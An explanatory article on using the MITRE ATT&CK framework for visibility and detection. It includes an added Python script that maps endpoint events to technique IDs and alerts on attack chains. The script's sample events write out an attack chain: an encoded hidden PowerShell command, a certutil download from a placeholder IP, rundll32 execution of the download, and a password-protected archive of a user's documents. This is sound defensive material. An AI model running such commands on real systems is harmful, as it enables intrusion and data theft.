Is our information system protected?




That is the final question of many meetings on cybersecurity. The first thing that comes to mind is: what do you mean by protected? What does "good" mean to an analyst, a SOC manager, or a CISO? The executive often only wants a YES or a NO. How do you answer this question simply, without explaining for an hour?

 

The same or a similar question can be asked about the new cybersecurity solutions you are planning to buy for your company. Independent companies test and compare solutions, but they focus only on certain types of attacks (exploits, malware...). After purchasing a new system, will you be able to answer the question: are we protected?

 

Many are turning to MITRE ATT&CK™ to better understand the threats in their unique environments and to judge how "good" their existing security infrastructure may be.

https://attack.mitre.org/matrices/enterprise/

 

What is the MITRE ATT&CK™ framework?

 

The MITRE Corporation started the ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) project in 2013 to document the tactics, techniques and procedures (TTPs) commonly used in attacks on Windows systems. It grew out of a need to document attacker behaviour for use in a MITRE research project called FMX. It is based on research and observation of real cyber attacks, and it helps by providing a common language for describing the techniques attackers use.

 

Simply put, ATT&CK can be presented as a matrix of tactics and techniques. Tactics refer to the "why": the reason an attacker performs an action, e.g. the attacker wants to access credentials.

Techniques refer to the "how": the way the attacker achieves that goal.

Sub-techniques give a more detailed description of the behaviour the attacker uses to achieve the goal. They were added to the matrix in 2020, because certain techniques needed to be broken down further depending on how the attack is carried out.

Procedures represent a specific implementation of a technique or sub-technique by a particular adversary. ATT&CK is updated regularly as new threats and techniques develop. ATT&CK matrices exist for the following security domains:

- Enterprise: Techniques threat actors use to access and operate on Windows, Mac, and Linux systems

- Cloud: Tactics and techniques used on cloud platforms

- Mobile: Techniques used on iOS and Android devices

- Pre-ATT&CK: Activities threat groups may undertake during targeting, technical development, and attack staging

- ICS: Techniques that may be used in operations targeting industrial control systems

 

The references and explanations provided by MITRE are a big help, but it does take a rather deep well of security knowledge to understand each technique in full detail. Besides references and explanations, every technique and sub-technique has its own ID, for example T1059 (Command and Scripting Interpreter) with the sub-technique T1059.001 (PowerShell).

 

The key to success when using ATT&CK lies in understanding what you can get out of it. ATT&CK is not all-powerful. Organizations that treat it as such could end up with a false sense of security and a misallocation of resources. Although ATT&CK is currently the most extensive knowledge base of adversary behaviour available, it will never cover every attack, because the space of possible attacks is effectively limitless. Organizations should use it as a knowledge base, not as a scorecard for measuring a company's level of cyber security.

 

In reality, if a security team were alerted every time a technique in ATT&CK was detected on an endpoint or on the network, they would be flooded with alerts every time a user compressed a file or an admin ran PowerShell on an endpoint. After all, there is significant overlap between attacker techniques, operating system functionality, and normal IT operations. Extensive tuning and detection engineering is needed to get to high-confidence, low-noise detections. Many techniques should rarely, if ever, alert on their own. They should instead be used as contextual indicators that raise the confidence of other alerts. Teams need to understand what is right for alerting in their environment, and which ATT&CK matrix cells are more about visibility into techniques, to ensure the ability to hunt proactively and to enrich other security alerts.

 

https://attack.mitre.org/groups/

 

Once you understand the challenges and possible missteps one can make in using MITRE ATT&CK, it’s time to start thinking about what to do with it. A key concept when operationalizing ATT&CK is visibility.

 

Visibility is a word we hear commonly in security, and for good reason. You can't stop an adversary that you don't know is there. Visibility is about ensuring security teams can see into systems and collect the right information they need to prevent, detect, and respond to threats. This sounds straightforward in concept, but the practice is much more complicated given the millions or even billions of events happening on endpoints and on the network in a given day. You need to decide what data to gather, how to gather it, and where to put it.

 

Once the collected data is mapped to ATT&CK techniques, teams can start asking questions like:

- Where are there gaps in my visibility?

- How often does this occur in my environment?

- Can I associate this with a legitimate business process?

- What is the relative normalcy of the associated user or host?
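The two points above, that individual techniques are visibility rather than alerts and that frequency and normalcy on a host must be baselined before alerting, are easy to show in code. The following Python script is an added example, not code from the original post or from Elastic or MITRE. It tags constructed process-creation events (Sysmon/EDR style, invented for this example, using the 198.51.100.0/24 documentation range) with real ATT&CK technique IDs, counts how often each technique appears and on how many hosts, and raises an alert only when one host shows several techniques across several tactics inside a short window. The command-line indicators, the one-tactic-per-technique mapping and the thresholds (15 minutes, 3 techniques, 2 tactics) are simplifications chosen for the example; real ATT&CK lists several techniques under more than one tactic.

```python
"""Tag endpoint events with ATT&CK technique IDs and alert only on chains."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Simplified catalogue. IDs and names are real ATT&CK entries; mapping each
# technique to a single tactic is a simplification of the real matrix.
TECHNIQUES = {
    "T1059.001": ("PowerShell", "Execution"),
    "T1027": ("Obfuscated Files or Information", "Defense Evasion"),
    "T1105": ("Ingress Tool Transfer", "Command and Control"),
    "T1218.011": ("System Binary Proxy Execution: Rundll32", "Defense Evasion"),
    "T1560.001": ("Archive via Utility", "Collection"),
}


def ev(ts, host, user, image, command_line):
    return {"ts": ts, "host": host, "user": user, "image": image, "command_line": command_line}


# Constructed process-creation telemetry, not real logs. Events 1-3 are routine
# admin/user activity; events 4-7 are one attack chain on a single workstation.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ev("2021-03-01T09:00:00", "WS01", "alice", PS, r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
    ev("2021-03-01T09:01:00", "WS01", "alice", r"C:\Program Files\7-Zip\7z.exe", "7z.exe a report.7z report.docx"),
    ev("2021-03-01T09:05:00", "SRV02", "svc_admin", PS, r"powershell.exe -File C:\ops\patch.ps1"),
    ev("2021-03-01T14:02:10", "WS07", "bob", PS, "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    ev("2021-03-01T14:03:40", "WS07", "bob", r"C:\Windows\System32\certutil.exe",
       r"certutil.exe -urlcache -split -f http://198.51.100.7/a.dat C:\Users\bob\AppData\Local\Temp\a.dat"),
    ev("2021-03-01T14:05:12", "WS07", "bob", r"C:\Windows\System32\rundll32.exe",
       r"rundll32.exe C:\Users\bob\AppData\Local\Temp\a.dat,Start"),
    ev("2021-03-01T14:09:00", "WS07", "bob", r"C:\Program Files\7-Zip\7z.exe",
       r"7z.exe a -pS3cret C:\Users\bob\AppData\Local\Temp\out.7z C:\Users\bob\Documents"),
]


def tag_event(event):
    """Map one process-creation event to the technique IDs its indicators match."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    args = event["command_line"].lower().split()
    tags = set()
    if image == "powershell.exe":
        tags.add("T1059.001")
        if any(a in ("-enc", "-encodedcommand", "-ec") for a in args):
            tags.add("T1027")  # base64-encoded command line
    elif image == "certutil.exe" and "-urlcache" in args:
        tags.add("T1105")  # certutil used as a downloader
    elif image == "rundll32.exe":
        tags.add("T1218.011")
    elif image in ("7z.exe", "rar.exe", "winrar.exe") and "a" in args:
        tags.add("T1560.001")  # 'a' = add files to an archive
    return tags


def technique_frequency(events):
    """Baseline: how many events, and how many distinct hosts, show each technique.
    This answers "how often does this occur in my environment?" before alerting."""
    hosts, total = defaultdict(set), Counter()
    for e in events:
        for t in tag_event(e):
            total[t] += 1
            hosts[t].add(e["host"])
    return {t: {"events": total[t], "hosts": len(hosts[t])} for t in total}


def correlate(events, window=timedelta(minutes=15), min_techniques=3, min_tactics=2):
    """Alert per host only when one time window holds at least `min_techniques`
    distinct techniques spanning at least `min_tactics` tactics. A single
    technique (a user zipping a file, an admin running PowerShell) never alerts
    on its own; it only adds context to the chain."""
    by_host = defaultdict(list)
    for e in events:
        tags = tag_event(e)
        if tags:
            by_host[e["host"]].append((datetime.fromisoformat(e["ts"]), e["user"], tags))
    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda x: x[0])
        current = None  # open alert for this host, extended while the chain continues
        for i, (ts, user, tags) in enumerate(evs):
            recent = [x for x in evs[: i + 1] if ts - x[0] <= window]
            techniques = set().union(*(x[2] for x in recent))
            tactics = {TECHNIQUES[t][1] for t in techniques}
            if len(techniques) < min_techniques or len(tactics) < min_tactics:
                continue
            if current and ts - current["last_seen"] <= window:
                current["techniques"] |= techniques
                current["tactics"] |= tactics
                current["users"].add(user)
                current["last_seen"] = ts
            else:
                current = {"host": host, "first_seen": recent[0][0], "last_seen": ts,
                           "users": {user}, "techniques": techniques, "tactics": tactics}
                alerts.append(current)
    return alerts


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["ts"], e["host"], sorted(tag_event(e)) or "-")
    print("baseline:", technique_frequency(SAMPLE_EVENTS))
    for a in correlate(SAMPLE_EVENTS):
        print(f"ALERT {a['host']} {a['first_seen']:%H:%M}-{a['last_seen']:%H:%M} "
              f"techniques={sorted(a['techniques'])} tactics={sorted(a['tactics'])}")
```

Run as-is, the script tags seven events, reports that PowerShell (T1059.001) appears on three hosts and archiving (T1560.001) on two, and produces exactly one alert: WS07, where an encoded PowerShell command, a certutil download, a rundll32 execution and an archive creation occur within a few minutes. WS01 (PowerShell followed by a zip, two techniques) and SRV02 (PowerShell alone) stay quiet. Lowering `min_techniques` to 2 makes WS01's routine activity fire as well, which is the alert flood the text warns about.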

 

ATT&CK can also be a useful tool for security evaluations. It cannot replace a penetration test or a dedicated Red Team, but it can help teams with some quick-and-dirty assessments. Several software projects, including Caldera from MITRE and Atomic Red Team from Red Canary, can execute ATT&CK techniques on endpoints and generate real telemetry, which lets you check whether your sensors and detections actually see those techniques.

 

Conclusion

 

The cybersecurity world is moving at a rapid pace and adversaries are always coming up with new tactics to achieve their goals. Frameworks like MITRE ATT&CK, while not catch-all guidelines for the reasons mentioned above, are essential to developing stronger cybersecurity programs. With proper consideration and use of ATT&CK, security team leaders will be able to provide more insight into the strengths and weaknesses of their security program, and, ideally, answer the opening question with: "For now."

 

VMware Carbon Black and MITRE ATT&CK

VMware Carbon Black, a leading EDR provider, has recognized the significance of ATT&CK. As mentioned above, every technique has its own ID. In February 2020, MITRE ATT&CK technique IDs were integrated into the Endpoint Standard solution.

For more info visit: https://www.carbonblack.com/blog/mitre-attck-evalution-demonstrates-the-power-of-the-vmware-carbon-black-cloud/

 

Last year MITRE ran an evaluation of antivirus and EDR solutions. The evaluation emulated an attack by the APT29 group, a state-sponsored group distinguished by its commitment to stealthy and sophisticated execution of techniques through custom malware.

You can see the results VMware Carbon Black has achieved here: https://attackevals.mitre-engenuity.org/APT29/results/vmware/index.html

 

Source: How to use MITRE ATT&CK™, by Mark Dufresne, Protections Team Lead, Elastic Security

